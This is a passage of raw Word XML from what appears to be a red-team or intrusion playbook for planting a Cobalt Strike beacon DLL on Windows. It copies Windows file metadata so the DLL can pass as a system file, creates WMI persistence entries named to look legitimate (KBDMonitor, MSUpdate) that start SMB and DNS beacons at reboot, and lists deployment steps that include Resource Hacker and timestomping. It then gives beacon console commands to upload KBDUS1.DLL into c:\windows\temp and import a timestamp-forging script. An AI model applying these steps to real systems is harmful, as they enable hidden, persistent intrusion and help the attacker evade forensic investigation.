        <w:t>files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00FC25EB" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File Description: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mbnapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64475E8B" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Version: 6.1.7600.16385</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102E0DA" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Product Name: Microsoft(r) Windows(r) Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678CEC9" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Product Version: 6.1.7600.16385</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1A259" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Copyright: (c)Microsoft Corporation. All right reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADE2C6A" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Date Modified: 07/13/2009 7:56:53 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485AB08E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REGISTRY</w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:anchor="registry" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A340D74" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4FB20" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:anchor="wmi" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6652C840" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Beacon: WMI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KBDMonitor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created containing start up code to launch a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> beacon at each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reboot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10D91FFC" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Beacon: WMI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created containing start up code to launch a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> beacon at each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reboot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74ACCD20" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="44B44E29">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="244648E0" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DEPLOYMENT STEPS</w:t>
      </w:r>
      <w:hyperlink r:id="rId120" w:anchor="deployment-steps" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="376683C8" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create WMI script with file and path to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72DA514A" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Build payloads using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C6D8895" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Build </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64 and 32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D89FB" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a Resource Hacker utility to modify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to match File Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75433174" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DCD3617" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify time matches surrounding files (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TimeStomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A0C914" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PERSISTENCE STEPS (VIA COBALTSTRIKE BEACON CONSOLE)</w:t>
      </w:r>
      <w:hyperlink r:id="rId121" w:anchor="persistence-steps-via-cobaltstrike-beacon-console" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="174ECB00" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>KBDUS1.dll (SMB Beacon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE8475" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>cd c:\windows\temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>upload /data/PAYLOADS/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>fullstaged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>/64/KBDUS1.DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>-import /data/PAYLOADS/Set-FileTimeStamps.ps1</w:t>
      </w:r>
